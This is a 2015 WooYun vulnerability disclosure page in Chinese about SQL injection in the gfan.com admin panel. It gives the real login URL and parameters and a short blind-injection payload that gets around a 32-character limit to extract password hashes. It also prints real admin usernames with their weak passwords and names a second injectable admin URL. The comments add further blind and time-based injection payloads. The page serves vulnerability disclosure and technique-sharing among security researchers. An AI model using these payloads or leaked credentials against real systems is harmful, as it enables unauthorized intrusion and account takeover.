当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101960

漏洞标题:机锋网后台存在SQL注入漏洞(注射技巧bypass字符长度限制)

相关厂商:机锋网

漏洞作者: 子非海绵宝宝

提交时间:2015-03-17 22:34

修复时间:2015-03-22 22:36

公开时间:2015-03-22 22:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-17: 细节已通知厂商并且等待厂商处理中
2015-03-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT
感谢@Noxxx 大神的指点
报错注入变成32位字符限制注入

详细说明:

http://admin.tsz.gfan.com/login.php?act=logging


username=wangxi&password=123&auth=6268


这里的注入比较有意思

1.jpg


报错注入
但是....

2.jpg


他检查了长度 也就是说注入的完整语句不能超过32个字符
报错是肯定不够的 只能盲注

select * from `condorgame_managers` where `username`='123'' LIMIT 1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123'' LIMIT 1' at line 1 1064


看下的语句
那么可以这么写

duyun'&&SUBSTR(passwd,1,1)='a


使得语句变成
select * from `condorgame_managers` where `username`='duyun'&&SUBSTR(passwd,1,1)='a'
这样语句是29个字符 可以注入了
并且可以猜出密码的MD5值
用户名直接使用常用用户名进行爆破
duyun 123456
wangyu 123!@#
wangxi 321321
还都是弱密码
其中wangyu 123!@# 权限较大 可以操作的东西比较多

3.jpg


在其中找到新的注入点 且没有限制 盲注

http://admin.tsz.gfan.com/index.php?offset=15&mod=product&act=edit&time=&serverid=1023


4.jpg

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 子非海绵宝宝@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-22 22:36

厂商回复:

漏洞Rank:10 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-17 22:36 | Ton7BrEak ( 普通白帽子 | Rank:211 漏洞数:43 | 吃苦耐劳,我只会第一个!)

    加乌云了~打雷了 快回家收衣服啦!mark一下,当做教程。@水晶 好东西,妹纸快来看

  2. 2015-03-17 22:38 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    强到不行!!

  3. 2015-03-17 22:43 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    。。。。。 不玩众测来主站啊

  4. 2015-03-17 22:44 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @zeracker 无意发现的....就交主站了

  5. 2015-03-17 22:53 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @子非海绵宝宝 ||这种字符?

  6. 2015-03-17 23:04 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  7. 2015-03-17 23:48 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    果断关注!

  8. 2015-03-18 09:05 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    雷劈了一下。太乌云了。

  9. 2015-03-18 09:14 | light ( 普通白帽子 | Rank:261 漏洞数:48 | 精华漏洞数:36 | WooYun认证√ 艺术系教授 ...)

    mark 坐等神技

  10. 2015-03-18 09:26 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    围观大神

  11. 2015-03-18 09:33 | 我哪知道啊 ( 路人 | Rank:0 漏洞数:1 )

    mark

  12. 2015-03-18 10:37 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    mark学习

  13. 2015-03-18 11:45 | 3King ( 普通白帽子 | Rank:1129 漏洞数:92 | 【study at HNUST】非常感谢大家的关注~ 大...)

    6666666

  14. 2015-03-18 11:45 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)

    mark

  15. 2015-03-18 11:47 | winalva ( 路人 | Rank:9 漏洞数:3 | rank是什么?)

    mark学习

  16. 2015-03-18 12:13 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    学习

  17. 2015-03-18 14:42 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @子非海绵宝宝 good!

  18. 2015-03-18 15:35 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    666666666

  19. 2015-03-18 15:47 | gone ( 路人 | Rank:0 漏洞数:1 | 来学习的)

    学习

  20. 2015-03-19 11:06 | 水晶 ( 实习白帽子 | Rank:32 漏洞数:15 | 热爱生活,喜欢互联网)

    @Ton7BrEak OK

  21. 2015-03-19 15:58 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @机锋网 后交的都确认了 这个怎么没确认?

  22. 2015-03-22 20:17 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @xsser 求补RANK

  23. 2015-03-22 22:40 | 机锋网(乌云厂商)

    确认,正在解决,谢谢了

  24. 2015-03-22 22:54 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @机锋网 超时后4分钟就回复了....还我RANK....双倍!

  25. 2015-03-22 23:08 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    @子非海绵宝宝 深藏功与名

  26. 2015-03-22 23:08 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    这个确实改补

  27. 2015-03-22 23:10 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    有点意思啊.

  28. 2015-03-23 00:16 | Knight ( 实习白帽子 | Rank:38 漏洞数:10 | 刚刚上洗手间,看到一个玉树临风的少年,气...)

    目测穿山甲。

  29. 2015-03-23 08:19 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @子非海绵宝宝 看来我说对了,|| &&

  30. 2015-03-23 09:19 | 水晶 ( 实习白帽子 | Rank:32 漏洞数:15 | 热爱生活,喜欢互联网)

    @Ton7BrEak OK

  31. 2015-03-23 09:27 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    故意的╭(╯^╰)╮

  32. 2015-03-23 09:30 | Ton7BrEak ( 普通白帽子 | Rank:211 漏洞数:43 | 吃苦耐劳,我只会第一个!)

    厂商忽略的好啊~提前学到了~ (洞主很无奈啊!)

  33. 2015-03-23 16:28 | xtnnd ( 普通白帽子 | Rank:180 漏洞数:43 )

    @疯狗 求审核 http://www.wooyun.org/bugs/wooyun-2015-0100938/trace/ab0e5e5792df40ff91c799a791437d73http://www.wooyun.org/bugs/wooyun-2015-0103231/trace/81e4491c6f9b67c90badb817042f0a01

  34. 2015-03-23 19:07 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    学习了!

  35. 2015-03-26 13:03 | me1ody ( 路人 | Rank:26 漏洞数:15 | 乌云临时工)

    学习了 玩游戏

  36. 2015-03-28 09:46 | 炮灰乙 ( 路人 | Rank:6 漏洞数:4 | 我叫路人甲,我住在中国)

    这没有bypass啊 只能爆密码 我还以为从其它参数配合带进sql语句或者把一条sql拆成N条

  37. 2015-04-03 00:51 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    mid(data,1,1) = 'a'#substring(data,1,1) = 'a'#AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))' or 1 rlike '1 Some functions allow to search substrings: '-if(locate('f',data),1,0)# '-if(locate('fo',data),1,0)# '-if(locate('foo',data),1,0)# ● Some functions allow to cut substrings: length(trim(leading 'a' FROM data)) # length will be shorter length(replace(data, 'a', '')) # length will be shorter

  38. 2015-08-20 19:52 | Burn Egg ( 实习白帽子 | Rank:51 漏洞数:8 | 经验,范围,字典,思维)

    @子非海绵宝宝 长度限制应该也可以用passwd like 'a%',,